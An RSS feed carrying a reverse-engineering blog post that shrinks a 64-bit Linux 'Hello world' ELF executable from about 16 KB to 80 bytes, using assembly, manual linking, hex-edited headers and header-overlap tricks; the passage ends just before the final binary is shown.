<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Sigreturn Labs Blog</title>
    <link>https://sigreturn.com/blog/</link>
    <description>Notes from the lab — research, writeups, and product updates from Sigreturn Labs.</description>
    <language>en</language>
    <lastBuildDate>Sun, 16 Jun 2024 12:00:00 +0000</lastBuildDate>
    <atom:link href="https://sigreturn.com/blog/feed.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Building the smallest ELF program</title>
      <link>https://sigreturn.com/blog/building-the-smallest-elf-program/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/building-the-smallest-elf-program/</guid>
      <pubDate>Sun, 16 Jun 2024 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Reverse Engineering</category>
      <category>elf</category>
      <category>linux</category>
      <category>assembly</category>
      <category>x86-64</category>
      <description><![CDATA[<p>In this post we will have fun trying to create the smallest possible 64 bits Linux program (ELF binary) that simply outputs &ldquo;Hello world!&rdquo; when it is executed.</p>
<p>The idea here is to understand the compilation process, linking, how loader works, how <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF file format</a> is structured, and so on.</p>
<h2>State of the art</h2>
<p>So let&rsquo;s simply create a program in C that outputs our string. In this default case we will not optimize anything nor try to reduce our binary size.</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;

void main(void)
{
    printf(&quot;Hello world!&quot;);
}
</code></pre>
<p>Let&rsquo;s compile it with <strong>GCC</strong> and run it:</p>
<pre><code class="language-bash">$ gcc smallest_elf.c -o smallest_elf.bin
$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>Initial size: 16704 bytes.</p>
<p>The default compiled binary is quite big for only <strong>65</strong> bytes of written code. Why is that? Let&rsquo;s analyse out binary and check what we can remove to reduce its size.</p>
<h3>Too many sections</h3>
<pre><code>.interp
.note.gnu.propert
.note.gnu.build-i
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.data
.bss
.comment
.symtab
.strtab
.shstrtab
</code></pre>
<p>Well first of all, our binary has <strong>30</strong> sections inside, we don&rsquo;t need all of them. We do not need relocations, symbols, or even PLT/GOT and a lot of other stuff. The compiler produced the default binary it would produce even for longer code.</p>
<div class="admonition tip">
<p>Use <code>readelf</code> to see the ELF&rsquo;s sections: <code>readelf -S smallest_elf.bin</code></p>
</div>
<h3>Too many symbols</h3>
<pre><code>0000000000003dc8 d _DYNAMIC
0000000000003fb8 d _GLOBAL_OFFSET_TABLE_
0000000000002000 R _IO_stdin_used
                 w _ITM_deregisterTMCloneTable
                 w _ITM_registerTMCloneTable
000000000000215c r __FRAME_END__
0000000000002014 r __GNU_EH_FRAME_HDR
0000000000004010 D __TMC_END__
0000000000004010 B __bss_start
                 w __cxa_finalize@@GLIBC_2.2.5
0000000000004000 D __data_start
0000000000001100 t __do_global_dtors_aux
0000000000003dc0 d __do_global_dtors_aux_fini_array_entry
0000000000004008 D __dso_handle
0000000000003db8 d __frame_dummy_init_array_entry
                 w __gmon_start__
0000000000003dc0 d __init_array_end
0000000000003db8 d __init_array_start
00000000000011e0 T __libc_csu_fini
0000000000001170 T __libc_csu_init
                 U __libc_start_main@@GLIBC_2.2.5
0000000000004010 D _edata
0000000000004018 B _end
00000000000011e8 T _fini
0000000000001000 t _init
0000000000001060 T _start
0000000000004010 b completed.8061
0000000000004000 W data_start
0000000000001090 t deregister_tm_clones
0000000000001140 t frame_dummy
0000000000001149 T main
                 U printf@@GLIBC_2.2.5
00000000000010c0 t register_tm_clones
</code></pre>
<p>Our program has symbols, that&rsquo;s additional information we don&rsquo;t need to display our string.</p>
<div class="admonition tip">
<p>Use <code>nm</code> to see the ELF&rsquo;s symbols: <code>nm smallest_elf.bin</code></p>
</div>
<h3>Too much code</h3>
<p>First of all, the only executable section we need is <code>.text</code>, that&rsquo;s where our main code is. But we notice there are instructions outside this section:</p>
<pre><code>0000000000001000 &lt;.init&gt;:
    1000:   f3 0f 1e fa             endbr64
    1004:   48 83 ec 08             sub    rsp,0x8
    1008:   48 8b 05 d9 2f 00 00    mov    rax,QWORD PTR [rip+0x2fd9]
    100f:   48 85 c0                test   rax,rax
    1012:   74 02                   je     1016 &lt;__cxa_finalize@plt-0x2a&gt;
    1014:   ff d0                   call   rax
    1016:   48 83 c4 08             add    rsp,0x8
    101a:   c3                      ret
</code></pre>
<p>Also, there are <strong>388</strong> bytes of instructions in <code>.text</code> section, that&rsquo;s a lot considering we just want to output &ldquo;Hello world!&rdquo;.</p>
<div class="admonition tip">
<p>Use <code>objdump</code> to see the ELF&rsquo;s executable section&rsquo;s instructions: <code>objdump -d smallest_elf.bin</code></p>
</div>
<h3>Too much empty space</h3>
<p>We also notice something interesting in our binary, there is a <strong>lot</strong> of empty space, filled with zeroes.</p>
<pre><code>00000600: 0000 0000 0000 0000 0000 0000 0000 0000
00000610: 0000 0000 0000 0000 0000 0000 0000 0000
00000620: 0000 0000 0000 0000 0000 0000 0000 0000
00000630: 0000 0000 0000 0000 0000 0000 0000 0000
00000640: 0000 0000 0000 0000 0000 0000 0000 0000
00000650: 0000 0000 0000 0000 0000 0000 0000 0000
00000660: 0000 0000 0000 0000 0000 0000 0000 0000
00000670: 0000 0000 0000 0000 0000 0000 0000 0000
[...]
</code></pre>
<p>For example the space above has <strong>2544</strong> bytes of zeroes in total. There are several empty spaces like this.</p>
<div class="admonition tip">
<p>Use <code>xxd</code> to see a file&rsquo;s hexadecimal data: <code>xxd smallest_elf.bin</code></p>
</div>
<h2>Quick optimizations</h2>
<p>We will go ahead to try and reduce our executable&rsquo;s size, we will implement several methods so you can get an idea of what can be done to produce the smallest possible binary by manipulating compiled binary.</p>
<h3>Strip symbols</h3>
<p>First of all, let&rsquo;s remove all the symbols and relocation information from the executable.</p>
<pre><code class="language-bash">$ nm smallest_elf.bin
nm: smallest_elf.bin: no symbols
</code></pre>
<div class="admonition tip">
<p>Use <code>strip</code> to strip an executable from all its symbols and relocation information: <code>strip -s smallest_elf.bin</code></p>
</div>
<p>After the operation, the size of the binary goes from to <strong>16704</strong> to <strong>14472</strong>.</p>
<p>New size: 14472 bytes.</p>
<h3>Remove unnecessary sections</h3>
<p>We can also remove some sections that are unnecessary to the main task of our program, for example <code>.data</code>, or <code>.gnu.version</code>.</p>
<p>Indeed, we do not need those sections, for example our string &ldquo;Hello world!&rdquo; is already stored in <code>.rodata</code> section :</p>
<pre><code>00002000: 0100 0200 4865 6c6c 6f20 776f 726c 6421  ....Hello world!
</code></pre>
<div class="admonition tip">
<p>Use <code>objcopy</code> to remove a specific section from an ELF executable: <code>objcopy --remove-section .data smallest_elf.bin</code></p>
</div>
<h2>Major modifications</h2>
<p>We will go ahead to try and reduce our executable&rsquo;s size even more, we will implement several methods so you can get an idea of what can be done to produce the smallest possible binary while still keeping its initial function : displaying a string.</p>
<div class="admonition warning">
<p>Keep in mind that we&rsquo;re doing this for fun, and for the technical challenge. In real life, you should not release programs that you have modified that way.</p>
</div>
<h3>Get rid of programming language</h3>
<p>We all now programming languages are converted to assembly language by the compiler during the compilation process and the code can even be optimized automatically. The output may result in more instructions than needed for our task.</p>
<p>Let&rsquo;s re-write our code in assembly language!</p>
<pre><code class="language-asm">section .data
    msg:    db &quot;Hello world&quot;, 33, 10, 0
    format: db &quot;%s&quot;, 10, 0

section .text
    global main

main:
    extern printf
    push rbp
    mov rbp, rsp
    mov rdi, msg
    call printf
    pop rbp
    ret
</code></pre>
<p>We assemble the code with <code>nasm</code> then link the object with <code>gcc</code> then run it.</p>
<pre><code class="language-bash">$ nasm -f elf64 smallest_elf.asm &amp;&amp; gcc smallest_elf.o -o smallest_elf.bin -no-pie
$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>New size: 14368 bytes.</p>
<p>We only reduced our file size by <strong>104</strong> bytes by completely rewriting it in assembly. Why?</p>
<p>Well by giving the assembled code object to <code>gcc</code> we only told it what the <code>.text</code> content should look like, but all the other sections and additional data are still here. In order to get rid of it, we will have to link our binary ourselves, getting rid of <code>gcc</code> routines.</p>
<h2>Getting straight to the point</h2>
<p>We have rewritten the whole file in assembly and compiling it with GCC, but we&rsquo;re kind of stuck here. How do we reduce the size even more? Maybe trying another compiler? Reducing code even more?</p>
<p>Let&rsquo;s get straight to the point: we need the program to display &ldquo;Hello world!&rdquo;, that&rsquo;s it. We don&rsquo;t want external dependencies like the <code>printf()</code> function.</p>
<p>Let&rsquo;s rewrite the whole assembly code and remove all external references and symbols!</p>
<h3>Removing external references</h3>
<p>We will make the following changes to our assembly code:</p>
<ul>
<li>Removing any call to external functions like <code>printf()</code>. Instead, we&rsquo;ll use direct system calls like <code>write()</code> and <code>exit()</code>.</li>
<li>Removing references to a &ldquo;main&rdquo; function, we don&rsquo;t need that, we don&rsquo;t need &ldquo;functions&rdquo; in our program.</li>
<li>Removing prologues, epilogues, and stack frames: yes, those useless bytes at the beginning and end of our code, why would we need them here?</li>
<li>The whole code will be strictly about printing our buffer and exiting the program.</li>
</ul>
<pre><code class="language-asm">global _start

section .data
        msg:    db &quot;Hello world&quot;, 33, 10, 0

section .text

_start:
        mov rdi, 1      ; standard output
        mov rsi, msg    ; buffer to print
        mov rdx, 14     ; size of the buffer

        mov rax, 1      ; set write syscall

        syscall         ; call write

        mov rdi, 0      ; value to return
        mov rax, 0x3C   ; set exit syscall

        syscall         ; call exit
</code></pre>
<div class="admonition note">
<p>You can notice that I&rsquo;m using the exit system call to properly stop the program after printing the buffer. Otherwise, the program would crash, but the buffer will still be printed. Up to you to decide if you consider the crash important or not in this exercise.</p>
<p>In my case, I chose to consider the program should always properly exit.</p>
</div>
<h3>Get rid of compilers</h3>
<p>We don&rsquo;t have any C code anymore, why would we even need a compiler? Let&rsquo;s get rid of <code>gcc</code> and directly link the code ourselves.</p>
<pre><code class="language-bash">$ nasm -f elf64 smallest_elf.asm
$ ld -m elf_x86_64 smallest_elf.o -o smallest_elf.bin
</code></pre>
<p>Let&rsquo;s run it and check:</p>
<pre><code class="language-bash">$ ./smallest_elf.bin
Hello world!
</code></pre>
<p>With the rewritten assembly code and linking without using any compiler, we reduced the size to <strong>8488</strong> bytes.</p>
<p>New size: 8488 bytes.</p>
<h3>Get rid of the data section</h3>
<p>We initially put our &ldquo;Hello world!&rdquo; string in the <code>.data</code> section, but at this point we&rsquo;re not following any convention and we&rsquo;ll just remove the <code>.data</code> section to put our string directly inside the <code>.text</code> code section. Yeah it&rsquo;s a bit weird but don&rsquo;t worry, it will work.</p>
<pre><code class="language-asm">global _start

section .text

_start:
        mov rdi, 1      ; standard output
        mov rsi, msg    ; buffer to print
        mov rdx, 14     ; size of the buffer

        mov rax, 1      ; set write syscall

        syscall         ; call write

        mov rdi, 0      ; value to return
        mov rax, 0x3C   ; set exit syscall

        syscall         ; call exit
msg:
        db      &quot;Hello world&quot;, 33, 10, 0
</code></pre>
<p>Doing this small manipulation, we manage to divide by two the last size of the binary!</p>
<p>New size: 4360 bytes.</p>
<h3>Analysing the situation</h3>
<p>We did pretty much everything we could to reduce the binary size:</p>
<ul>
<li>Writing directly assembly code</li>
<li>No external function, no stack frames, only code section</li>
<li>No compiler, directly linking</li>
<li>Stripping the symbols</li>
</ul>
<p>At this point, there isn&rsquo;t much more we can do in a conventional way to reduce the binary size. By the way, why is it still that big?</p>
<p>We can notice through <code>readelf</code> command that our binary still has a lot of stuff inside of it. We have the <code>.shstrtab</code> section header, and a <strong>huge</strong> amount of empty space, because some tables and sections have been encoded as &ldquo;empty spaces&rdquo; filled with null bytes in the binary.</p>
<p>Nearly <strong>92%</strong> of our binary is filled with useless empty spaces.</p>
<p>Check the binary composition with <code>readelf -a smallest_elf.bin</code> and the actual data in hexadecimal with <code>xxd smallest_elf.bin</code>. Notice all the zero bytes.</p>
<h2>Going further</h2>
<p>Some step in the linking process will produce this kind of ELF binary filled with a lot of empty space, that will simply increase our binary size.</p>
<p>Now we will have to build our binary ourselves, manually, without relying on the assembler or the linker.</p>
<h3>Identifying the needed information</h3>
<p>There is a lot of useless information in our binary so let&rsquo;s start by identification strictly what we need:</p>
<ul>
<li>The ELF header, otherwise it would not be considered an an ELF by the system and could not be loaded</li>
<li>Our actual code</li>
</ul>
<p>This portion at the beginning is our header:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 0010 4000 0000 0000  ..&gt;.......@.....
00000020: 4000 0000 0000 0000 4810 0000 0000 0000  @.......H.......
00000030: 0000 0000 4000 3800 0200 4000 0300 0200  ....@.8...@.....
00000040: 0100 0000 0400 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000                      ........
</code></pre>
<p>And this portion is our code:</p>
<pre><code>00001000: bf01 0000 0048 be27 1040 0000 0000 00ba  .....H.'.@......
00001010: 0e00 0000 b801 0000 000f 05bf 0000 0000  ................
00001020: b83c 0000 000f 0548 656c 6c6f 2077 6f72  .&lt;.....Hello wor
00001030: 6c64 210a 00                             ld!..
</code></pre>
<p>And that&rsquo;s it, we don&rsquo;t really care what all the remaining is.</p>
<p>Let&rsquo;s manually construct our new binary with only these two blocks of data. Use any method you like to do that, I used simple Linux commands.</p>
<pre><code class="language-bash">$ head -c 120 smallest_elf.bin &gt; new_smallest_elf.bin.header # extract header
$ tail -c 264 smallest_elf.bin &gt; tmp.bin # extract end of file starting from our code
$ head -c 53 tmp.bin &gt; new_smallest_elf.bin.code # extract our code from it
$ cat new_smallest_elf.bin.header new_smallest_elf.bin.code &gt; new_smallest_elf.bin # assemble both blocks into one final ELF executable
</code></pre>
<p>So this is what we get:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 0010 4000 0000 0000  ..&gt;.......@.....
00000020: 4000 0000 0000 0000 4810 0000 0000 0000  @.......H.......
00000030: 0000 0000 4000 3800 0200 4000 0300 0200  ....@.8...@.....
00000040: 0100 0000 0400 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 bf01 0000 0048 be27  .............H.'
00000080: 1040 0000 0000 00ba 0e00 0000 b801 0000  .@..............
00000090: 000f 05bf 0000 0000 b83c 0000 000f 0548  .........&lt;.....H
000000a0: 656c 6c6f 2077 6f72 6c64 210a 00         ello world!..
</code></pre>
<p>Obviously, a lot of information from the headers is inaccurate since we modified the whole structure of the file and the program will not execute:</p>
<pre><code class="language-bash">$ ./new_smallest_elf.bin
-bash: ./new_smallest_elf.bin: cannot execute binary file: Exec format error
</code></pre>
<p>Let&rsquo;s check what&rsquo;s happening with <code>readelf</code>:</p>
<pre><code class="language-bash">$ readelf -a new_smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x401000
  Start of program headers:          64 (bytes into file)
  Start of section headers:          4168 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         2
  Size of section headers:           64 (bytes)
  Number of section headers:         3
  Section header string table index: 2
readelf: Error: Reading 192 bytes extends past end of file for section headers
readelf: Error: Section headers are not available!
readelf: Error: Reading 112 bytes extends past end of file for program headers

There is no dynamic section in this file.
readelf: Error: Reading 112 bytes extends past end of file for program headers
</code></pre>
<p>Several issues identified here:</p>
<ul>
<li>Entry point address incorrect: our new code starts at offset <strong>0x78</strong>, not <strong>0x1000</strong>.</li>
<li>Start of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Number of program headers incorrect: we only have <strong>1</strong> program header and not <strong>2</strong>.</li>
<li>Size of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Number of section headers incorrect: we do not have any section header, this should be <strong>zero</strong>.</li>
<li>Section header string table index: we do not have any section header, this should be <strong>zero</strong>.</li>
</ul>
<p>We also need to adjust several stuff in the program header:</p>
<ul>
<li>Virtual address of program needs to be changed from <strong>0x400000</strong> to <strong>0x400078</strong> because this is where our program starts. Not aligned? We don&rsquo;t care.</li>
<li>Permissions of the segment in the program header is read-only (<strong>0x004</strong>) and needs to be readable, writable and executable for simplicity (<strong>0x007</strong>).</li>
</ul>
<p>We manually apply all those modification directly through a hexadecimal editor and run <code>readelf</code> again:</p>
<pre><code class="language-bash">$ readelf -a new_smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000078 0x0000000000400078 0x0000000000400000
                 0x00000000000000b0 0x00000000000000b0  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.
No processor specific unwind information to decode

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.
</code></pre>
<p>This time, no error. But we still need to adjust one small detail inside our actual code. Indeed, we assembled the code before making all those modifications and we are calling the <code>write</code> function: <code>write(1, buffer, 13);</code></p>
<p>Indeed, the &ldquo;Hello world!&rdquo; buffer is no longer located at offset <strong>0x1027</strong>, the new offset is <strong>0x9f</strong>.</p>
<p>Here is the final modified binary (modified bytes versus the previous dump):</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 bf01 0000 0048 be9f  .............H..
00000080: 0040 0000 0000 00ba 0e00 0000 b801 0000  .@..............
00000090: 000f 05bf 0000 0000 b83c 0000 000f 0548  .........&lt;.....H
000000a0: 656c 6c6f 2077 6f72 6c64 210a            ello world!.
</code></pre>
<p>Let&rsquo;s test it now:</p>
<pre><code class="language-bash">./new_smallest_elf.bin
Hello world!
</code></pre>
<p>New size: 172 bytes.</p>
<p>We have hit a new record by reducing our initial program size from <strong>16704</strong> to only <strong>172</strong> bytes.</p>
<p>We could call it a day, but hey, can we actually do better?</p>
<h2>Going even further</h2>
<p>Let&rsquo;s try to shrink even more our executable. But in order to do that, let&rsquo;s modify a little bit the initial exercise. We no longer need to display &ldquo;Hello world!&rdquo; string, but just compile <strong>any</strong> ELF executable, smallest as possible.</p>
<p>In order to be considered a valid executable:</p>
<ul>
<li>It must execute at least one assembly instruction</li>
<li>It must not crash</li>
</ul>
<p>Let&rsquo;s take our functional header and remove all the custom code at offset <strong>0x78</strong>. We will append new code there.</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000                      ........
</code></pre>
<h3>Smallest possible code</h3>
<p>Considering the previous conditions, our new code must include a routine to properly exit the program. We could try something like this:</p>
<pre><code class="language-asm">mov rax, 0x3C   ; set exit syscall
syscall         ; call exit
</code></pre>
<p>Yes, we did omit the <code>rdi</code> register containing the value to be returned by the program. We don&rsquo;t really care, the return value is not a condition. We&rsquo;ll let the program return whatever will be in the register.</p>
<p>Once converted to opcodes we get <code>b8 3c 00 00 00 0f 05</code>, so <strong>7</strong> bytes. Instead of using a <code>mov</code> instruction, let&rsquo;s use <code>push</code> and <code>pop</code> for the same result.</p>
<pre><code class="language-asm">push 0x3C       ; set exit syscall
pop rax
syscall         ; call exit
</code></pre>
<p>This gets us the opcodes <code>6a 3c 58 0f 05</code> (<strong>5</strong> bytes) which is slightly better, we&rsquo;ll stick with that one. Let&rsquo;s append it to our header and run it!</p>
<pre><code>00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..&gt;.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0700 0000 7800 0000 0000 0000  ........x.......
00000050: 7800 4000 0000 0000 0000 4000 0000 0000  x.@.......@.....
00000060: b000 0000 0000 0000 b000 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 6a3c 580f 05         ........j&lt;X..
</code></pre>
<p>We notice that the program runs fine and even returns the default <strong>zero</strong> value.</p>
<pre><code class="language-bash">$ ./smallest_elf_v2.bin
$ echo $?
0
</code></pre>
<p>New size: 125 bytes.</p>
<h3>Going beyond the documentation</h3>
<p>Actually we can still save a few bytes by taking advantage of the fact that some portions of the header will not be verified upon execution. For example the 7-bytes &ldquo;padding&rdquo; after the magic byte or the last elements of the ELF header.</p>
<p>First, let&rsquo;s move our actual code, from the end of the program, directly inside the padding of the ELF header, and update the offsets accordingly. It will no longer be located at <strong>0x78</strong>, but <strong>0x08</strong>.</p>
<p>Then, let&rsquo;s overlap the ELF header and the program header at the very end of the ELF header, by starting the program header at offset <strong>0x38</strong> instead of <strong>0x40</strong>. This works because the original overwritten data is <code>0100 0000</code>, and our program header starts with <code>0100 0000</code> as well.</p>
<p>Which gives us the following binary:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 6a3c 580f 0500 0000  .ELF....j&lt;X.....
00000010: 0200 3e00 0100 0000 0800 4000 0000 0000  ..&gt;.......@.....
00000020: 3800 0000 0000 0000 0000 0000 0000 0000  8...............
00000030: 0000 0000 4000 3800 0100 0000 0700 0000  ....@.8.........
00000040: 0800 0000 0000 0000 0800 4000 0000 0000  ..........@.....
00000050: 0000 4000 0000 0000 b000 0000 0000 0000  ..@.............
00000060: b000 0000 0000 0000 0010 0000 0000 0000  ................
</code></pre>
<p>New size: 112 bytes.</p>
<h3>Tricks and more tricks</h3>
<p>The previous idea of overlapping the two headers can actually be applied to a larger scale.</p>
<p>The range from <strong>0x18</strong> to <strong>0x40</strong> can actually contain both ELF header and program header overlapped. The values that can be modified without impacting the program&rsquo;s functionality are in bold.</p>
<table>
<thead>
<tr>
<th>Original ELF header</th>
<th>Original program header</th>
<th>New overlapped header</th>
</tr>
</thead>
<tbody>
<tr>
<td>08</td>
<td>01</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>40</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>07</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>38</td>
<td>08</td>
<td>18</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>08</td>
<td>18</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>40</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>01</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>40</strong></td>
<td>01</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>40</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>38</td>
<td><strong>00</strong></td>
<td>38</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>01</td>
<td>B0</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>07</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
</tbody>
</table>
<p>By modifying the image address of our program and relocating our code right after the magic number, we get this executable of <strong>80 bytes</strong>:</p>
<pre><code>00000000: 7f45 4c46 6a3c 580f 0500 0000 0000 0000  .ELFj&lt;X.........
00000010: 0200 3e00 0100 0000 0100 0000 0100 0000  ..&gt;.............
00000020: 1800 0000 0000 0000 1800 0000 0100 0000  ................
00000030: 0000 0100 0000 3800 0100 0000 0000 0000  ......8.........
00000040: 0100 0000 0000 0000 0000 0000 0000 0000  ................
</code></pre>
<p>What we notice first is that most tools are lost with this binary. The Linux <code>file</code> command can only tell that this is an ELF, and <code>readelf</code> doesn&rsquo;t like it either.</p>
<pre><code class="language-bash">$ file smallest_elf.bin
smallest_elf.bin: ELF (AROS Research Operating System), unknown class 106

$ readelf -a smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 6a 3c 58 0f 05 00 00 00 00 00 00 00
  Class:                             &lt;unknown: 6a&gt;
  Data:                              &lt;unknown: 3c&gt;
  Version:                           88 &lt;unknown&gt;
  OS/ABI:                            AROS
  ABI Version:                       5
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x1
  Start of program headers:          1 (bytes into file)
  Start of section headers:          24 (bytes into file)
  Flags:                             0x0
  Size of this header:               24 (bytes)
  Size of program headers:           0 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 1 &lt;corrupt: out of range&gt;
readelf: Warning: possibly corrupt ELF file header - it has a non-zero section header offset, but no section headers

There are no sections to group in this file.

There is no dynamic section in this file.
</code></pre>
<p>Same thing for GDB debugger, it doesn&rsquo;t recognize this file and refuses to debug it: <em>not in executable format: file format not recognized</em>.</p>
<p>But all things considered, this program actually runs fine and respects all our conditions:</p>
<pre><code class="language-bash"># Normal run
$ ./smallest_elf.bin
$ echo $?
0

# Checking with strace
$ strace ./smallest_elf.bin
execve(&quot;./smallest_elf.bin&quot;, [&quot;./smallest_elf.bin&quot;], 0x7fffd6fb2730 /* 25 vars */) = 0
exit(0)                                 = ?
+++ exited with 0 +++
</code></pre>
<p>New size: 80 bytes.</p>
<p>Just for the art, let&rsquo;s clean up the executable by setting to zero all bytes that are not needed.</p>
<pre><code>00000000: 7f45 4c46 6a3c 580f 0500 0000 0000 0000  .ELFj&lt;X.........
00000010: 0200 3e00 0000 0000 0100 0000 0100 0000  ..&gt;.............
00000020: 1800 0000 0000 0000 1800 0000 0100 0000  ................
00000030: 0000 0000 0000 3800 0100 0000 0000 0000  ......8.........
00000040: 0100 0000 0000 0000 0000 0000 0000 0000  ................
</code></pre>
<h3>Is it the end?</h3>
<p>We have probably reached the limits of the ELF 64 bits format, we produced the smallest 64 bits ELF possible that does not crash upon execution and correctly exits with a 0 status code.</p>
<p>Final size: 80 bytes.</p>
<p>Final binary:</p>
